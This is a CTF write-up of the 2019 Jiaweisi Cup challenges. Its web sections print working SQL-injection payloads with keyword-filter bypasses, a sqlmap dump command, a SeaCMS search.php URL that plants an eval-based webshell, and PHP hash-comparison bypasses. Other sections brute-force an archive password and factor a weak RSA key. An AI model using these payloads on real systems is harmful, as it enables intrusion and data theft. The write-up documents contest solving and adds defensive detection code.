2019 "嘉韋思杯" (Jiaweisi Cup) Shanghai Cybersecurity Invitational Tournament WriteUp

  • 8 October 2019
  • Notes

Web1 土肥原賢二 (Doihara Kenji) 100pt

Submitting gid=1' produces an error while gid=1 or 1=1 renders normally, so the parameter was handed straight to sqlmap, which reported the following injection techniques:

Parameter: gid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: gid=-4255' OR 8149=8149#
    Vector: OR [INFERENCE]#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: gid=3' OR (SELECT 3949 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(3949=3949,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Ilbj
    Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: gid=3' OR SLEEP(5)-- XAjo
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: gid=3' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a717671,0x4845486a6d6e79654d7a704461694b426771414872527a57624a724e78735943417a686b53664d6b,0x7178787a71)#
    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY]#

Payload: sqlmap -u "http://47.103.43.235:81/quest/web/a/index.php?gid=1" -p gid -v 3 -D luozhen -T flag -C "id,flag" --dump
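As an added example (not part of the original write-up), the Python below runs detection logic for the four sqlmap techniques reported above over web-server access-log lines. The log lines are constructed samples that reuse the reported payloads, and the signatures are my own assumptions about how each technique looks on the wire.

```python
import re
from urllib.parse import unquote_plus

# One regex per technique, named as sqlmap labels them in the output above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bOR\s+(\d+)=\1\s*(?:#|--)", re.I),
    "error-based (FLOOR)": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
QUOTE_BREAK = re.compile(r"=\s*-?\d+'")  # the first probe: a stray quote after a numeric value
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify(query_string):
    """Return the techniques whose signature appears in a URL-decoded query string."""
    q = unquote_plus(query_string)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(q)]
    if not hits and QUOTE_BREAK.search(q):
        hits.append("probe (quote after numeric parameter)")
    return hits


def scan_log(lines):
    """Return (request_target, techniques) for every log line that trips a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or "?" not in m.group(1):
            continue
        hits = classify(m.group(1).split("?", 1)[1])
        if hits:
            findings.append((m.group(1), hits))
    return findings


# Constructed access-log lines; injected values are percent-encoded as a server would log them.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Oct/2019:10:00:00 +0800] "GET /quest/web/a/index.php?gid=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Oct/2019:10:00:01 +0800] "GET /quest/web/a/index.php?gid=1%27 HTTP/1.1" 500 231',
    '10.0.0.5 - - [08/Oct/2019:10:00:02 +0800] "GET /quest/web/a/index.php?gid=-4255%27%20OR%208149%3D8149%23 HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Oct/2019:10:00:03 +0800] "GET /quest/web/a/index.php?gid=3%27%20OR%20(SELECT%203949%20FROM(SELECT%20COUNT(*),CONCAT(0x71,(SELECT%20(ELT(3949%3D3949,1))),0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20Ilbj HTTP/1.1" 500 231',
    '10.0.0.5 - - [08/Oct/2019:10:00:04 +0800] "GET /quest/web/a/index.php?gid=3%27%20OR%20SLEEP(5)--%20XAjo HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Oct/2019:10:00:05 +0800] "GET /quest/web/a/index.php?gid=3%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 777',
]

if __name__ == "__main__":
    for target, techniques in scan_log(SAMPLE_LOG):
        print(target, "->", ", ".join(techniques))
```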

Web2 戴星炳 (Dai Xingbing) 200pt

The flag is returned if the correct result is submitted within 2 seconds. Python script:

import re
import requests

url = 'http://47.103.43.235:82/web/a/index.php'
r = requests.session()  # one session so the POST is tied to the expression we were served
text = r.get(url).text
# the arithmetic expression sits between </p><p> and </p> in the page body
calc = re.search("</p><p>(.*?)</p>", text).group(1)
ans = eval(calc)  # evaluates untrusted page content; tolerable only in a throwaway CTF script
data = {'result': ans}
res = r.post(url, data)  # must arrive within the 2 s window
print(res.text)

Output: flag{Y0U4R33o_F4ST!}.

By the time the write-up reached this point the organizers had closed the contest site again, leaving only the challenge links reachable, so the remaining challenges are recorded one by one below.

Web3 MD5 collision

Challenge link: http://47.103.43.235:85/a/

Pressing F12 to view the page source reveals the following PHP code in a comment:

if ((string)$_POST['param1']!==(string)$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2']))

Both comparisons (!== and ===) are strict, so a weak-typing (type-juggling) bypass is not available.

Instead, an MD5 collision generator (fastcoll_v1.0.0.5.exe.zip) can produce two strings with different contents but identical MD5 hashes.

The sample pair from the post "MD5碰撞" by 奶奶奶奶奶糖 was submitted here for testing.

Payload:

param1=  %D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%16%B4%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%DC%9F%95ab%D2%09P%A1%5D%12%3B%1ETZ%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29%EF%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%1E%7Ch%B0%96%A7%E5U%EBn1q%CA%D0%8B%C7%1BSP  &param2=  %D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%164%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%5C%A0%95ab%D2%09P%A1%5D%12%3B%1ET%DA%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29o%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%9E%7Bh%B0%96%A7%E5U%EBn1q%CA%D0%0B%C7%1BSP

This yields flag{MD5@_@success}.

Web4 SeaCMS

Challenge URL: http://47.103.43.235:84/

Admin panel: http://47.103.43.235:84/admin/login.php

Trying weak credentials on the admin login returns "admin user does not exist".

Following the search.php exploitation technique from "Seacms漏洞分析利用復現 By Assassin" (SeaCMS vulnerability analysis and reproduction), write a one-line webshell and connect to it with Cknife.

Payload:

http://47.103.43.235:84/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

flag.txt is found in the web root, giving flag{!!seacms_@@}.

Web5 Break the sha

Challenge URL: http://47.103.43.235:82/web/b/index.php

F12 on the page source shows <!--index.phps-->; downloading and opening index.phps gives:

<?php
error_reporting(0);
$flag = '********';
if (isset($_POST['name']) and isset($_POST['password'])){
    if ($_POST['name'] == $_POST['password'])
        print 'name and password must be diffirent';
    else if (sha1($_POST['name']) === sha1($_POST['password']))
        die($flag);
    else print 'invalid password';
}
?>

The name and password fields are compared with the loose == operator, while their sha1 hashes are compared with the strict ===. Arrays bypass this: two different arrays are not == to each other, yet on PHP 5/7 sha1() given an array only emits a warning and returns NULL, so NULL === NULL holds.

Payload:

name[]=1&password[]=2

Response: flag{Y0ujustbr0ke_sha1}.

Web6 SQLi2

Challenge URL: http://47.103.43.235:83/web/a/index.php?id===QM

Note the id===QM: MQ== is the Base64 encoding of 1, so the value is presumably Base64-encoded and then reversed before being passed.

Manual injection tests show that the keywords and, or, select and union are filtered and that single quotes, double quotes, equals signs and spaces are stripped. The keyword filter runs only once, so writing each keyword twice (nested inside itself) survives it; /**/ stands in for spaces, hex-encoded strings replace quoted strings, and regexp replaces the equals sign.

  • Enumerate databases
-1/**/uniunionon/**/selselectect/**/1,group_concat(schema_name),3,4,5,6/**/from/**/infoorrmation_schema.schemata--
  • Enumerate the tables in ctf_sql
-1/**/uniunionon/**/selselectect/**/1,group_concat(table_name),3,4,5,6/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema/**/regexp/**/0x6374665f73716c--
  • Enumerate the columns of flag
-1/**/uniunionon/**/selselectect/**/1,group_concat(column_name),3,4,5,6/**/from/**/infoorrmation_schema.columns/**/where/**/table_name/**/regexp/**/0x666c6167--
  • Retrieve the flag
-1/**/uniunionon/**/selselectect/**/1,group_concat(flag),3,4,5,6/**/from/**/flag--
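As an added example (not the author's code), the Python below decodes the reversed-Base64 id parameter and models the single-pass filter described above, to show why a detector must look at the value after sanitization rather than before. The filter model and the placeholder host are assumptions; the only real fix is a parameterized query, not a better keyword list.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

KEYWORDS = ("union", "select", "and", "or")  # keywords the write-up says are filtered


def decode_id(raw):
    """'==QM' -> reversed 'MQ==' -> Base64-decoded '1'."""
    return base64.b64decode(raw[::-1]).decode()


def encode_id(value):
    """Inverse transform; used here only to build the sample requests below."""
    return base64.b64encode(value.encode()).decode()[::-1]


def simulate_filter(s):
    """Single-pass model of the challenge's sanitizer (an assumption drawn from the write-up)."""
    for kw in KEYWORDS:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)  # each keyword removed once, never re-scanned
    return re.sub(r"""['"= ]""", "", s)


def analyze_request(url):
    """Decode id, run it through the filter model, and flag what the filter lets through.

    'uniunionon' only becomes 'union' after the inner keyword is cut out, so a
    single-pass filter never sees the keyword it just created.
    """
    decoded = decode_id(parse_qs(urlsplit(url).query)["id"][0])
    filtered = simulate_filter(decoded)
    flagged = any(kw in filtered.lower() for kw in KEYWORDS) or "/**/" in filtered
    return {"decoded": decoded, "filtered": filtered, "flagged": flagged}


BASE = "http://target.example/web/a/index.php?id="  # placeholder host, not the challenge's
BENIGN = BASE + quote(encode_id("1"), safe="")
# The write-up's final payload (dump the flag table), encoded the way the app expects
PROBE = BASE + quote(encode_id(
    "-1/**/uniunionon/**/selselectect/**/1,group_concat(flag),3,4,5,6/**/from/**/flag--"), safe="")

if __name__ == "__main__":
    for u in (BENIGN, PROBE):
        print(analyze_request(u))
```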

Crypto1 神秘代碼 (Mysterious code)


Repeatedly Base64-decoding the given text, layer after layer, yields:

fB__l621a4h4g_ai{&i}

That is 20 characters; arranging them into 4 columns and 5 rows gives:

fB__  l621  a4h4  g_ai  {&i}

Reading the grid column by column gives flag{B64_&_2hai_14i}.
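As an added example (not the author's code), the Python below automates the two steps above: peel Base64 layers until the data stops looking like Base64, then read the result column-wise. The input is a constructed sample (the intermediate string from the write-up wrapped in three Base64 layers), since the original ciphertext is not reproduced here.

```python
import base64
import binascii
import re

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # standard alphabet only; '_' or '{' ends the peeling


def peel_base64(blob, limit=32):
    """Decode repeatedly while the data still looks like Base64 and yields printable ASCII."""
    text = blob.strip()
    for _ in range(limit):
        if len(text) % 4 or not B64_RE.match(text):
            break
        try:
            nxt = base64.b64decode(text, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not nxt.isprintable():
            break
        text = nxt
    return text


def read_columns(text, cols=4):
    """Write the text row by row into `cols` columns, then read it back column by column."""
    rows = [text[i:i + cols] for i in range(0, len(text), cols)]
    return "".join(row[c] for c in range(cols) for row in rows if c < len(row))


def solve(blob, cols=4):
    return read_columns(peel_base64(blob), cols)


# Constructed sample: the write-up's intermediate string wrapped in three Base64 layers
SAMPLE = "fB__l621a4h4g_ai{&i}"
for _ in range(3):
    SAMPLE = base64.b64encode(SAMPLE.encode()).decode()

if __name__ == "__main__":
    print(peel_base64(SAMPLE))  # fB__l621a4h4g_ai{&i}
    print(solve(SAMPLE))        # flag{B64_&_2hai_14i}
```

A plaintext that happens to be valid Base64 of printable text would be peeled one layer too far; the alphabet check stops here because the final string contains characters outside the Base64 alphabet.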

Crypto2 神秘代碼2 (Mysterious code 2)

A guesswork challenge. Trying shift transformations eventually turns up flag{c4es4r_variation}, a variant of the Caesar shift in which the shift grows with the character position.

C++ Payload:

#include <iostream>
#include <string>

using namespace std;

int main() {
    string s = "bg[`sZ*Zg'dPfP`VM_SXVd";
    for (int diff = 0; diff <= 10; diff++) { // diff = 4 yields flag{c4es4r_variation}
        for (int i = 0; i < (int)s.length(); i++) {
            cout << char(s[i] + diff + i); // shift grows by one per position
        }
        cout << endl;
    }
    return 0;
}

Crypto3 希爾密碼 (Hill cipher)

The encryption matrix and ciphertext are given and the plaintext is wanted. Following the standard Hill cipher decryption procedure, the 3x3 decryption matrix works out to:

[[8,16,27],[8,99,24],[27,24,27]]. Multiplying it by the 3x4 ciphertext matrix [[23,10,12,24],[16,2,25,3],[9,0,9,5]] gives the matrix [[683,112,739,375],[1984,278,2787,609],[1248,318,1167,855]] (the twelve values the script below reads row by row).

Reducing each entry modulo 26 and converting to letters prints hillisflagxx. C++ script:

#include <iostream>

using namespace std;

// entries of (decryption matrix x ciphertext matrix), row by row
int a[12] = {683,112,739,375,1984,278,2787,609,1248,318,1167,855};

int main() {
    for(int i = 0; i < 12; i++) {
        cout << (char)('a' + a[i] % 26);
    }
    return 0;
}
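As an added example (not the author's script), the Python below carries the Hill computation through with the write-up's matrices and goes one step further: it inverts the decryption matrix modulo 26 and re-encrypts the recovered plaintext to confirm the ciphertext comes back, which is the check a solver wants before trusting a hand-derived matrix. The modular-inverse routine is mine; only D and C come from the page.

```python
from math import gcd

MOD = 26
D = [[8, 16, 27], [8, 99, 24], [27, 24, 27]]           # decryption matrix from the write-up
C = [[23, 10, 12, 24], [16, 2, 25, 3], [9, 0, 9, 5]]   # 3x4 ciphertext matrix from the write-up


def matmul_mod(a, b, mod=MOD):
    """Multiply a (n x k) by b (k x m) and reduce every entry modulo mod."""
    return [[sum(a[i][t] * b[t][j] for t in range(len(b))) % mod
             for j in range(len(b[0]))] for i in range(len(a))]


def minor(m, i, j):
    return [row[:j] + row[j + 1:] for r, row in enumerate(m) if r != i]


def det(m):
    """Integer determinant by cofactor expansion (fine for the 3x3 used here)."""
    if len(m) == 1:
        return m[0][0]
    return sum((-1) ** j * m[0][j] * det(minor(m, 0, j)) for j in range(len(m)))


def inverse_mod(m, mod=MOD):
    """Inverse of a square matrix modulo mod via the adjugate; needs det coprime to mod."""
    d = det(m) % mod
    if gcd(d, mod) != 1:
        raise ValueError("matrix is not invertible modulo %d" % mod)
    d_inv = pow(d, -1, mod)
    n = len(m)
    adj = [[(-1) ** (i + j) * det(minor(m, j, i)) for j in range(n)] for i in range(n)]
    return [[(adj[i][j] * d_inv) % mod for j in range(n)] for i in range(n)]


def to_text(matrix):
    """Read the reduced matrix row by row as lowercase letters, as the C++ script does."""
    return "".join(chr(ord("a") + x) for row in matrix for x in row)


def hill_decrypt(dec_matrix=D, cipher=C):
    return to_text(matmul_mod(dec_matrix, cipher))


def round_trip_ok(dec_matrix=D, cipher=C):
    """Re-encrypt the recovered plaintext with D^-1 mod 26 and check the ciphertext comes back."""
    plain = matmul_mod(dec_matrix, cipher)
    key = inverse_mod(dec_matrix)
    return matmul_mod(key, plain) == [[x % MOD for x in row] for row in cipher]


if __name__ == "__main__":
    print(hill_decrypt())   # hillisflagxx
    print(round_trip_ok())  # True
```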

Crypto4 RSA256

Challenge URL: http://47.103.43.235:85/C/RSA256.tar.gz

Downloading and extracting the archive gives the public key gy.key and the ciphertext fllllllag.txt.

  • Solution 1

Inspect the public key with openssl:

$ openssl rsa -pubin -in gy.key -text -modulus
Public-Key: (256 bit)
Modulus:
    00:a9:bd:4c:7a:77:63:37:0a:04:2f:e6:be:c7:dd:
    c8:41:60:2d:b9:42:c7:a3:62:d1:b5:d3:72:a4:d0:
    89:12:d9
Exponent: 65537 (0x10001)
Modulus=A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9
writing RSA key
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKm9THp3YzcKBC/mvsfdyEFgLblCx6Ni
0bXTcqTQiRLZAgMBAAE=
-----END PUBLIC KEY-----

This gives the modulus N=76775333340223961139427050707840417811156978085146970312315886671546666259161 (0xA9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9) and the public exponent e=65537 (0x10001).

A 256-bit modulus is small enough to factor; http://factordb.com returns the factors directly:

p = 273821108020968288372911424519201044333
q = 280385007186315115828483000867559983517

With n (factored into p and q), e and the ciphertext c known, the private exponent d can be computed and the message decrypted. Python script:

import gmpy2
import rsa

p = 273821108020968288372911424519201044333
q = 280385007186315115828483000867559983517
n = 76775333340223961139427050707840417811156978085146970312315886671546666259161
e = 65537
d = int(gmpy2.invert(e, (p-1)*(q-1)))  # private exponent: e^-1 mod phi(n)
privatekey = rsa.PrivateKey(n, e, d, p, q)
with open("fllllllag.txt", "rb") as f:
    print(rsa.decrypt(f.read(), privatekey).decode())

This gives flag{_2o!9_CTF_ECUN_}.

  • Solution 2

Given the public key gy.key and the ciphertext fllllllag.txt, RsaCtfTool (https://github.com/Ganapati/RsaCtfTool) can recover the plaintext directly:

D:\Tools\Crypto\RSACtfTool\RsaCtfTool
$ python2 RsaCtfTool.py --publickey gy.key --uncipherfile fllllllag.txt
[+] Clear text : b'\x00\x02c\x8bL\xc2u\x86\xc6\xbe\x00flag{_2o!9_CTF_ECUN_}'

Result: flag{_2o!9_CTF_ECUN_}.

Misc1 奇怪的單點音 (Strange beeps)

Challenge URL: http://47.103.43.235:85/d/奇怪的單點音.wav

Playing the audio reveals noticeable noise and three beeps. Opening it in Audacity and examining the spectrogram shows a flag string:

Hint: the organizers stated that flag{85a9d4517d4725b98cbc9fd_554216} is not the final answer and asked participants to read the question carefully.

Then comes the guesswork. The string, underscore included, is 32 characters long and looks like an MD5 hash. The underscore was replaced in turn with the Morse-code letter t and with each digit absent from the string; with the underscore replaced by 0, the hash was cracked successfully at ChaMd5.org.

Result: flag{hsd132456}.

Misc2 二維碼 (QR code)

Download the image and probe it with binwalk:

$ python binwalk index.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced
41            0x29            Zlib compressed data, compressed
5708          0x164C          Zip archive data, encrypted at least v1.0 to extract, compressed size: 64, uncompressed size: 52, name: key.txt

An archive is embedded in the image. Its hint says the extraction password is an administrator's QQ number, so after carving it out with binwalk -e the password was brute-forced with ARCHPR.

The password is 674290437; extracting the archive gives flag{d6@YX$_m^aa0}.

Misc3 jsfuck

Challenge URL: http://47.103.43.235:85/b/%E7%AC%AC%E4%B8%80%E9%A2%98_js%EF%BC%9F.txt

Base64-decoding the file gives a JSFuck-encoded JavaScript script; pasting it into the browser Console and running it prints flag{sdf465454dfgert32}.

RE1 梅津美治郎 (Umezu Yoshijirō)

No packer is detected; the binary is a 32-bit PE file. Opening it in IDA:

Level 1 is trivial; on to Level 2:

There is an anti-debugging routine here: under x86dbug the program exits immediately, but OllyDbg (or the 52pojie build of OllyDbg) gets past it. Continuing with dynamic debugging leads into the check routine.

Its logic is simple: each byte of the data array below is XORed with 0x2 and compared against the input; a match passes the level.

a = [0x75, 0x31, 0x6e, 0x6e, 0x66, 0x32, 0x6c, 0x67]  # bytes recovered from the binary
for i in a:
    print(chr(i ^ 0x2), end='')

This gives w3lld0ne.

Joining the two level answers with an underscore gives flag{r0b0RUlez!_w3lld0ne}.

RE2 76號 (No. 76)

No packer; a 32-bit ELF file. This one can be solved by static analysis alone. Among the strings there is a "correct":

Following the cross-reference leads into main. Reading main, printf is followed by getline to take the input, then a check function at 0x804848f is called and its return value decides whether the input is correct. Entering the check function:

Decompiling the check function shows a switch. Its two arguments are the address of our input string and 0. The key is to find the path that returns 1.

Pay attention to every return, focusing on those that may return 1. For example:

At the start of the while loop a stack slot is set to 1 on each iteration; that value depends on our input, starting from v5[0]. Reading the C code carefully, try:

This matches the program flow. Continue by guessing the case where v2 equals 2, and so on. The cases 4 and 8 are special and were verified by hand; the pattern holds, giving flag{09vdf7wefijbk}.

Download link for the Crypto, Misc and RE challenge files: https://pan.baidu.com/s/10tlJmUVZtekuYNgTi9eCNQ (extraction code: bkiv)